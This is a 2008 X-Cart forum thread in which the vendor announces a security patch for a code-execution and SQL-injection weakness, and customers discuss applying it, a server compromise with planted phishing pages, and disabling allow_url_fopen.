| ||||||||||
Shopping cart software Solutions for online shops and malls | ||||||||||
|
#1
|
|||||||||
|
|||||||||
Security bulletin 2008-25-12
Dear X-Cart customer,
During internal audit activities several moderate security issues have been detected in X-Cart. The issues make the software potentially vulnerable to attackers who wish to gain access to the application back-end. The solution is to apply the update released by Qualiteam. SEVERITY Moderate IMPACT A malicious user can redeclare used variables, execute his own php code and, as a result, gain access to the application back-end, store database and server file system. AFFECTED VERSIONS All X-Cart versions from 4.0.0 to 4.1.11 SOLUTION We strongly recommend X-Cart users to install the security fix available in the HelpDesk 'File Area'. The following security improvements are included in the patch: - protection from unallowed access to back-end, store database and server file system, using GET or POST queries (formed in a special way) has been added. - an extra protection level against SQL injections has been added. Where to download the patch: Please, check your File Area: * For X-Cart 4.1.11 version: check folders X-Cart -> X-Cart 4.1.11 (current version) -> Updates and patches * For X-Cart 4.0.0 - 4.1.10 versions: check folders X-Cart -> X-Cart supporting files for prev versions -> {Your X-Cart branch} -> {Your X-Cart version} -> Updates and patches Installation instructions can be found in the README.txt file attached to the .tgz archive. NOTE: If you are using X-Cart versions 4.1.0 - 4.1.11, please, ensure you had installed all the previous security fixes *prior to* applying this new patch. If you have any questions or concerns, feel free to contact our support team via your Helpdesk. X-Cart Team & Qualiteam Tech Support department
__________________
Eugene Kaznacheev, Evangelist/Product Manager at Ecwid: http://www.ecwid.com/ (since Sept 2009) ex-Head of X-Cart Tech Support Department ex- X-Cart Hosting Manager - X-Cart hosting ex-X-Cart Technical Support Engineer Note: For the official guaranteed tech support services please turn to the Customers HelpDesk. |
|||||||||
#2
|
|||||||||
|
|||||||||
Re: Security bulletin 2008-25-12
Wow... Well thanks for posting these patches so quickly!
__________________
Carl Tice X-Cart 4.6.6 X-Payments 3.0 ReBOOT 3.4.1 PHP 5.6.30 MySQL 5.6.35 Linux 2.6.32-042stab120.18 ionCube PHP Loader v4.7.3 Perl 5.10.1 |
|||||||||
#3
|
|||||||
|
|||||||
Re: Security bulletin 2008-25-12
Yay Merry Chistmas :P
__________________
Emerson █ Total Server Solutions LLC- Quality X-Cart Hosting █ Recommended X-Cart Hosting Provider - US and UK servers █ Does your host backup your site? We do EVERY HOUR!!! █ Shared Hosting | Managed Cloud | Dedicated Servers |
|||||||
#4
|
|||||||
|
|||||||
Re: Security bulletin 2008-25-12
Ene,
Is this patch a revision of patch 2008-18-12? Seems all the same files are being patched on both.
__________________
Emerson █ Total Server Solutions LLC- Quality X-Cart Hosting █ Recommended X-Cart Hosting Provider - US and UK servers █ Does your host backup your site? We do EVERY HOUR!!! █ Shared Hosting | Managed Cloud | Dedicated Servers |
|||||||
#5
|
|||||||
|
|||||||
Re: Security bulletin 2008-25-12
Quote:
Looking at 4.0.19 it patches register.php like previous security patches but not any of the same lines so it can be applied independently (not sure why you would want to do that). It does mean you can't use the overwrite version if you have applied the prior security patches - use the diffs.
__________________
Manuka Bay Company X-Cart Version 4.0.19 [Linux] UGG Boots and other fine sheepskin products http://www.snowriver.com |
|||||||
#6
|
|||||||||
|
|||||||||
Re: Security bulletin 2008-25-12
Quote:
No. It is a different patch.
__________________
Eugene Kaznacheev, Evangelist/Product Manager at Ecwid: http://www.ecwid.com/ (since Sept 2009) ex-Head of X-Cart Tech Support Department ex- X-Cart Hosting Manager - X-Cart hosting ex-X-Cart Technical Support Engineer Note: For the official guaranteed tech support services please turn to the Customers HelpDesk. |
|||||||||
#7
|
|||||||
|
|||||||
Re: Security bulletin 2008-25-12
I reported this vulnerability on the 21st when I found that someone had somehow installed a couple fake Bank of America login pages on my server. I would strongly suggest that all users check their file system just to be safe.
The pages were loaded to my /payment/ directory on my server. Also... if you don't need it to be on "allow_url_fopen" in your php.ini should be off as that will stop them from running the scripts from other servers.
__________________
Version 4.1.11 |
|||||||
#8
|
|||||||||
|
|||||||||
Re: Security bulletin 2008-25-12
There was only one file to update for version 4.1.10, prepare.php, so it was a pretty simple patch
|
|||||||||
#9
|
|||||||
|
|||||||
Re: Security bulletin 2008-25-12
Just to clarify to everyone.
There is 2 patches One from DEC 18th and a NEW one from the 25 we installed the one from the 18th but not the one from the 25 and we got hacked
__________________
4.1.8 Xcart |
|||||||
#10
|
|||||||||
|
|||||||||
Re: Security bulletin 2008-25-12
We're seeing a few people who have not applied the secondary patches and are now having issues. The news of the latest exploit seems to have spread pretty quickly.
__________________
Conor Treacy - Big Red SEO - @bigredseo Search Engine Optimization & Internet Marketing - We Bring Your Website Out Of Hiding! If you can't be found on Google, Bing or Yahoo, you pretty much don't exist on the Internet. Omaha SEO Office with National & Local SEO Services Hourly Consulting - great for SEO Disaster Recovery, Audits and DIY Guidance |
|||||||||
|
|||
X-Cart forums © 2001-2020
|